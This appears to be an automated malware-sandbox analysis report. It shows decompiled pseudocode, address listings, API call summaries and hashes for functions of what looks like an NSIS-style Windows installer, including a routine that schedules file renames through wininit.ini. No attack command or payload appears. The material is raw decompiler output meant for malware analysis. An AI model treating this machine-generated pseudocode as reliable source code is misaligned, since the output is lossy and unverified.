                                                                        				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                        				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                        				E00403DDC(_t99);
                                                                        				SendMessageA(_t99, 0x45b, 1, 0);
                                                                        				_t86 =  *( *0x7a2f88 + 0x68);
                                                                        				if(_t86 < 0) {
                                                                        					_t86 = GetSysColor( ~_t86);
                                                                        				}
                                                                        				SendMessageA(_t99, 0x443, 0, _t86);
                                                                        				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                        				 *0x79e54c =  *0x79e54c & 0x00000000;
                                                                        				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                        				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                        				 *0x79f568 =  *0x79f568 & 0x00000000;
                                                                        				return 0;
                                                                        			}

















                                                                        0x00403eff
                                                                        0x00404025
                                                                        0x00404081
                                                                        0x00404085
                                                                        0x0040415c
                                                                        0x0040415e
                                                                        0x0040415e
                                                                        0x00404164
                                                                        0x00404164
                                                                        0x00404167
                                                                        0x00000000
                                                                        0x0040416e
                                                                        0x00404093
                                                                        0x00404095
                                                                        0x0040409f
                                                                        0x004040aa
                                                                        0x004040ad
                                                                        0x004040b0
                                                                        0x004040bb
                                                                        0x004040be
                                                                        0x004040c5
                                                                        0x004040d3
                                                                        0x004040eb
                                                                        0x004040fe
                                                                        0x0040410e
                                                                        0x00404110
                                                                        0x00404110
                                                                        0x004040c5
                                                                        0x0040411a
                                                                        0x00000000
                                                                        0x00404125
                                                                        0x00404129
                                                                        0x0040413a
                                                                        0x0040413a
                                                                        0x00404140
                                                                        0x0040414e
                                                                        0x0040414e
                                                                        0x00000000
                                                                        0x00404152
                                                                        0x0040411a
                                                                        0x00404030
                                                                        0x00000000
                                                                        0x00404044
                                                                        0x0040404a
                                                                        0x00404050
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404075
                                                                        0x00404077
                                                                        0x0040407c
                                                                        0x00000000
                                                                        0x0040407c
                                                                        0x00404030
                                                                        0x00403f05
                                                                        0x00403f08
                                                                        0x00403f0d
                                                                        0x00403f1e
                                                                        0x00403f1e
                                                                        0x00403f25
                                                                        0x00403f28
                                                                        0x00403f2a
                                                                        0x00403f2f
                                                                        0x00403f38
                                                                        0x00403f3e
                                                                        0x00403f4a
                                                                        0x00403f4d
                                                                        0x00403f56
                                                                        0x00403f5b
                                                                        0x00403f5e
                                                                        0x00403f63
                                                                        0x00403f7a
                                                                        0x00403f81
                                                                        0x00403f94
                                                                        0x00403f97
                                                                        0x00403fac
                                                                        0x00403fb3
                                                                        0x00403fb8
                                                                        0x00403fbd
                                                                        0x00403fbd
                                                                        0x00403fcc
                                                                        0x00403fdb
                                                                        0x00403fdd
                                                                        0x00403ff3
                                                                        0x00404002
                                                                        0x00404004
                                                                        0x00000000

                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                                                        • GetDlgItem.USER32 ref: 00403F8E
                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                        • GetSysColor.USER32(?), ref: 00403FBD
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                        • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                        • GetDlgItem.USER32 ref: 00404065
                                                                        • SendMessageA.USER32(00000000), ref: 00404068
                                                                        • GetDlgItem.USER32 ref: 00404093
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                        • LoadCursorA.USER32 ref: 004040E2
                                                                        • SetCursor.USER32(00000000), ref: 004040EB
                                                                        • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                        • LoadCursorA.USER32 ref: 0040410B
                                                                        • SetCursor.USER32(00000000), ref: 0040410E
                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: N$open
                                                                        • API String ID: 3615053054-904208323
                                                                        • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                        • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                        • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                        • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00405707(long _a4, long _a16) {
                                                                        				CHAR* _v0;
                                                                        				intOrPtr* _t13;
                                                                        				long _t14;
                                                                        				int _t19;
                                                                        				void* _t27;
                                                                        				long _t28;
                                                                        				intOrPtr* _t36;
                                                                        				int _t42;
                                                                        				intOrPtr* _t43;
                                                                        				long _t48;
                                                                        				CHAR* _t50;
                                                                        				void* _t52;
                                                                        				void* _t54;
                                                                        
                                                                        				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
                                                                        				_t50 = _v0;
                                                                        				if(_t13 != 0) {
                                                                        					_t19 =  *_t13(_a4, _t50, 5);
                                                                        					if(_t19 != 0) {
                                                                        						L16:
                                                                        						 *0x7a3010 =  *0x7a3010 + 1;
                                                                        						return _t19;
                                                                        					}
                                                                        				}
                                                                        				 *0x7a1710 = 0x4c554e;
                                                                        				if(_t50 == 0) {
                                                                        					L5:
                                                                        					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
                                                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                                                        						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
                                                                        						GetWindowsDirectoryA(0x7a1188, 0x3f0);
                                                                        						lstrcatA(0x7a1188, "\\wininit.ini");
                                                                        						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
                                                                        						_t54 = _t19;
                                                                        						if(_t54 == 0xffffffff) {
                                                                        							goto L16;
                                                                        						}
                                                                        						_t48 = GetFileSize(_t54, 0);
                                                                        						_t5 = _t42 + 0xa; // 0xa
                                                                        						_t52 = GlobalAlloc(0x40, _t48 + _t5);
                                                                        						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
                                                                        							L15:
                                                                        							_t19 = CloseHandle(_t54);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							if(E00405624(_t52, "[Rename]\r\n") != 0) {
                                                                        								_t27 = E00405624(_t25 + 0xa, "\n[");
                                                                        								if(_t27 == 0) {
                                                                        									L13:
                                                                        									_t28 = _t48;
                                                                        									L14:
                                                                        									E00405670(_t52 + _t28, 0x7a0d88, _t42);
                                                                        									SetFilePointer(_t54, 0, 0, 0);
                                                                        									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
                                                                        									GlobalFree(_t52);
                                                                        									goto L15;
                                                                        								}
                                                                        								_t36 = _t27 + 1;
                                                                        								_t43 = _t36;
                                                                        								if(_t36 >= _t52 + _t48) {
                                                                        									L21:
                                                                        									_t28 = _t36 - _t52;
                                                                        									goto L14;
                                                                        								} else {
                                                                        									goto L20;
                                                                        								}
                                                                        								do {
                                                                        									L20:
                                                                        									 *((char*)(_t43 + _t42)) =  *_t43;
                                                                        									_t43 = _t43 + 1;
                                                                        								} while (_t43 < _t52 + _t48);
                                                                        								goto L21;
                                                                        							}
                                                                        							E004059BF(_t52 + _t48, "[Rename]\r\n");
                                                                        							_t48 = _t48 + 0xa;
                                                                        							goto L13;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					CloseHandle(E00405690(_t50, 0, 1));
                                                                        					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
                                                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}
















                                                                        0x00405715
                                                                        0x0040571c
                                                                        0x00405720
                                                                        0x00405729
                                                                        0x0040572d
                                                                        0x00405879
                                                                        0x00405879
                                                                        0x00000000
                                                                        0x00405879
                                                                        0x0040572d
                                                                        0x00405739
                                                                        0x0040574f
                                                                        0x00405777
                                                                        0x00405782
                                                                        0x00405786
                                                                        0x004057a9
                                                                        0x004057b1
                                                                        0x004057bd
                                                                        0x004057d4
                                                                        0x004057da
                                                                        0x004057df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004057ee
                                                                        0x004057f0
                                                                        0x004057fd
                                                                        0x00405801
                                                                        0x00405872
                                                                        0x00405873
                                                                        0x00000000
                                                                        0x0040581d
                                                                        0x0040582a
                                                                        0x0040588f
                                                                        0x00405896
                                                                        0x0040583d
                                                                        0x0040583d
                                                                        0x0040583f
                                                                        0x00405848
                                                                        0x00405853
                                                                        0x00405865
                                                                        0x0040586c
                                                                        0x00000000
                                                                        0x0040586c
                                                                        0x00405898
                                                                        0x0040589e
                                                                        0x004058a0
                                                                        0x004058af
                                                                        0x004058af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004058a2
                                                                        0x004058a2
                                                                        0x004058a4
                                                                        0x004058a7
                                                                        0x004058ab
                                                                        0x00000000
                                                                        0x004058a2
                                                                        0x00405835
                                                                        0x0040583a
                                                                        0x00000000
                                                                        0x0040583a
                                                                        0x00405801
                                                                        0x00405751
                                                                        0x0040575c
                                                                        0x00405765
                                                                        0x00405769
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405769
                                                                        0x00405883

                                                                        APIs
                                                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                        • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                                                        • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                                                        • wsprintfA.USER32 ref: 004057A0
                                                                        • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                        • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                        • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                        • GlobalFree.KERNEL32 ref: 0040586C
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                        • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                        • API String ID: 3633819597-1342836890
                                                                        • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                        • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                        • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                        • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagPAINTSTRUCT _v96;
                                                                        				struct HDC__* _t70;
                                                                        				struct HBRUSH__* _t87;
                                                                        				struct HFONT__* _t94;
                                                                        				long _t102;
                                                                        				signed int _t126;
                                                                        				struct HDC__* _t128;
                                                                        				intOrPtr _t130;
                                                                        
                                                                        				if(_a8 == 0xf) {
                                                                        					_t130 =  *0x7a2f88;
                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                        					_a8 = _t70;
                                                                        					GetClientRect(_a4,  &_v32);
                                                                        					_t126 = _v32.bottom;
                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                        					while(_v32.top < _t126) {
                                                                        						_a12 = _t126 - _v32.top;
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                        						_a16 = _t87;
                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                        						DeleteObject(_a16);
                                                                        						_v32.top = _v32.top + 4;
                                                                        					}
                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                        						_a16 = _t94;
                                                                        						if(_t94 != 0) {
                                                                        							_t128 = _a8;
                                                                        							_v32.left = 0x10;
                                                                        							_v32.top = 8;
                                                                        							SetBkMode(_t128, 1);
                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                        							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                                                        							SelectObject(_t128, _a8);
                                                                        							DeleteObject(_a16);
                                                                        						}
                                                                        					}
                                                                        					EndPaint(_a4,  &_v96);
                                                                        					return 0;
                                                                        				}
                                                                        				_t102 = _a16;
                                                                        				if(_a8 == 0x46) {
                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                                                        				}
                                                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                        			}













                                                                        0x0040100a
                                                                        0x00401039
                                                                        0x00401047
                                                                        0x0040104d
                                                                        0x00401051
                                                                        0x0040105b
                                                                        0x00401061
                                                                        0x00401064
                                                                        0x004010f3
                                                                        0x00401089
                                                                        0x0040108c
                                                                        0x004010a6
                                                                        0x004010bd
                                                                        0x004010cc
                                                                        0x004010cf
                                                                        0x004010d5
                                                                        0x004010d9
                                                                        0x004010e4
                                                                        0x004010ed
                                                                        0x004010ef
                                                                        0x004010ef
                                                                        0x00401100
                                                                        0x00401105
                                                                        0x0040110d
                                                                        0x00401110
                                                                        0x00401112
                                                                        0x00401118
                                                                        0x0040111f
                                                                        0x00401126
                                                                        0x00401130
                                                                        0x00401142
                                                                        0x00401156
                                                                        0x00401160
                                                                        0x00401165
                                                                        0x00401165
                                                                        0x00401110
                                                                        0x0040116e
                                                                        0x00000000
                                                                        0x00401178
                                                                        0x00401010
                                                                        0x00401013
                                                                        0x00401015
                                                                        0x0040101f
                                                                        0x0040101f
                                                                        0x00000000

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32 ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                        • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                        • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                        • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                        				struct _ITEMIDLIST* _v8;
                                                                        				char _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				CHAR* _t35;
                                                                        				signed int _t37;
                                                                        				signed int _t38;
                                                                        				signed int _t49;
                                                                        				char _t51;
                                                                        				signed int _t61;
                                                                        				char* _t62;
                                                                        				char _t67;
                                                                        				signed int _t69;
                                                                        				CHAR* _t79;
                                                                        				signed int _t86;
                                                                        				signed int _t88;
                                                                        				void* _t89;
                                                                        
                                                                        				_t61 = _a8;
                                                                        				if(_t61 < 0) {
                                                                        					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                                                        				}
                                                                        				_t62 = _t61 +  *0x7a2fb8;
                                                                        				_t35 = 0x7a1f20;
                                                                        				_t79 = 0x7a1f20;
                                                                        				if(_a4 - 0x7a1f20 < 0x800) {
                                                                        					_t79 = _a4;
                                                                        					_a4 = _a4 & 0x00000000;
                                                                        				}
                                                                        				while(1) {
                                                                        					_t67 =  *_t62;
                                                                        					_a11 = _t67;
                                                                        					if(_t67 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _t79 - _t35 - 0x400;
                                                                        					if(_t79 - _t35 >= 0x400) {
                                                                        						break;
                                                                        					}
                                                                        					_t62 = _t62 + 1;
                                                                        					__eflags = _t67 - 0xfc;
                                                                        					if(__eflags <= 0) {
                                                                        						if(__eflags != 0) {
                                                                        							 *_t79 = _t67;
                                                                        							_t79 =  &(_t79[1]);
                                                                        							__eflags = _t79;
                                                                        						} else {
                                                                        							 *_t79 =  *_t62;
                                                                        							_t79 =  &(_t79[1]);
                                                                        							_t62 = _t62 + 1;
                                                                        						}
                                                                        						continue;
                                                                        					}
                                                                        					_t37 =  *((char*)(_t62 + 1));
                                                                        					_t69 =  *_t62;
                                                                        					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                                                        					_v28 = _t69;
                                                                        					_v20 = _t37;
                                                                        					_t70 = _t69 | 0x00008000;
                                                                        					_t38 = _t37 | 0x00008000;
                                                                        					_v24 = _t69 | 0x00008000;
                                                                        					_t62 = _t62 + 2;
                                                                        					__eflags = _a11 - 0xfe;
                                                                        					_v16 = _t38;
                                                                        					if(_a11 != 0xfe) {
                                                                        						__eflags = _a11 - 0xfd;
                                                                        						if(_a11 != 0xfd) {
                                                                        							__eflags = _a11 - 0xff;
                                                                        							if(_a11 == 0xff) {
                                                                        								__eflags = (_t38 | 0xffffffff) - _t86;
                                                                        								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                                                        							}
                                                                        							L38:
                                                                        							_t79 =  &(_t79[lstrlenA(_t79)]);
                                                                        							_t35 = 0x7a1f20;
                                                                        							continue;
                                                                        						}
                                                                        						__eflags = _t86 - 0x1b;
                                                                        						if(_t86 != 0x1b) {
                                                                        							__eflags = (_t86 << 0xa) + 0x7a4000;
                                                                        							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                                                        						} else {
                                                                        							E0040591D(_t79,  *0x7a2f84);
                                                                        						}
                                                                        						__eflags = _t86 + 0xffffffeb - 6;
                                                                        						if(_t86 + 0xffffffeb < 6) {
                                                                        							L29:
                                                                        							E00405BFB(_t79);
                                                                        						}
                                                                        						goto L38;
                                                                        					}
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					 *_t79 =  *_t79 & 0x00000000;
                                                                        					_t88 = 4;
                                                                        					__eflags = _v20 - _t88;
                                                                        					if(_v20 != _t88) {
                                                                        						_t49 = _v28;
                                                                        						__eflags = _t49 - 0x2b;
                                                                        						if(_t49 != 0x2b) {
                                                                        							__eflags = _t49 - 0x26;
                                                                        							if(_t49 != 0x26) {
                                                                        								__eflags = _t49 - 0x25;
                                                                        								if(_t49 != 0x25) {
                                                                        									__eflags = _t49 - 0x24;
                                                                        									if(_t49 != 0x24) {
                                                                        										goto L19;
                                                                        									}
                                                                        									GetWindowsDirectoryA(_t79, 0x400);
                                                                        									goto L18;
                                                                        								}
                                                                        								GetSystemDirectoryA(_t79, 0x400);
                                                                        								goto L18;
                                                                        							}
                                                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                                                        							__eflags =  *_t79;
                                                                        							if( *_t79 != 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							E004059BF(_t79, "C:\\Program Files");
                                                                        							goto L18;
                                                                        						} else {
                                                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                                                        							L18:
                                                                        							__eflags =  *_t79;
                                                                        							if( *_t79 != 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							goto L19;
                                                                        						}
                                                                        					} else {
                                                                        						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                                                        						L19:
                                                                        						__eflags =  *0x7a3004;
                                                                        						if( *0x7a3004 == 0) {
                                                                        							_t88 = 2;
                                                                        						}
                                                                        						do {
                                                                        							_t88 = _t88 - 1;
                                                                        							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                                                        							__eflags = _t51;
                                                                        							if(_t51 != 0) {
                                                                        								 *_t79 =  *_t79 & 0x00000000;
                                                                        								__eflags =  *_t79;
                                                                        								goto L25;
                                                                        							}
                                                                        							__imp__SHGetPathFromIDListA(_v8, _t79);
                                                                        							_v12 = _t51;
                                                                        							E0040521C(_t70, _v8);
                                                                        							__eflags = _v12;
                                                                        							if(_v12 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							L25:
                                                                        							__eflags = _t88;
                                                                        						} while (_t88 != 0);
                                                                        						__eflags =  *_t79;
                                                                        						if( *_t79 != 0) {
                                                                        							__eflags = _a8;
                                                                        							if(_a8 != 0) {
                                                                        								lstrcatA(_t79, _a8);
                                                                        							}
                                                                        						}
                                                                        						goto L29;
                                                                        					}
                                                                        				}
                                                                        				 *_t79 =  *_t79 & 0x00000000;
                                                                        				if(_a4 == 0) {
                                                                        					return _t35;
                                                                        				}
                                                                        				return E004059BF(_a4, _t35);
                                                                        			}






















                                                                        0x004059e8
                                                                        0x004059ef
                                                                        0x00405a00
                                                                        0x00405a00
                                                                        0x00405a0a
                                                                        0x00405a0c
                                                                        0x00405a13
                                                                        0x00405a1b
                                                                        0x00405a21
                                                                        0x00405a24
                                                                        0x00405a24
                                                                        0x00405bd5
                                                                        0x00405bd5
                                                                        0x00405bd9
                                                                        0x00405bdc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a31
                                                                        0x00405a37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a3d
                                                                        0x00405a3e
                                                                        0x00405a41
                                                                        0x00405bc8
                                                                        0x00405bd2
                                                                        0x00405bd4
                                                                        0x00405bd4
                                                                        0x00405bca
                                                                        0x00405bcc
                                                                        0x00405bce
                                                                        0x00405bcf
                                                                        0x00405bcf
                                                                        0x00000000
                                                                        0x00405bc8
                                                                        0x00405a47
                                                                        0x00405a4b
                                                                        0x00405a5b
                                                                        0x00405a62
                                                                        0x00405a65
                                                                        0x00405a68
                                                                        0x00405a6a
                                                                        0x00405a6d
                                                                        0x00405a70
                                                                        0x00405a71
                                                                        0x00405a75
                                                                        0x00405a78
                                                                        0x00405b73
                                                                        0x00405b77
                                                                        0x00405ba7
                                                                        0x00405bab
                                                                        0x00405bb0
                                                                        0x00405bb4
                                                                        0x00405bb4
                                                                        0x00405bb9
                                                                        0x00405bbf
                                                                        0x00405bc1
                                                                        0x00000000
                                                                        0x00405bc1
                                                                        0x00405b79
                                                                        0x00405b7c
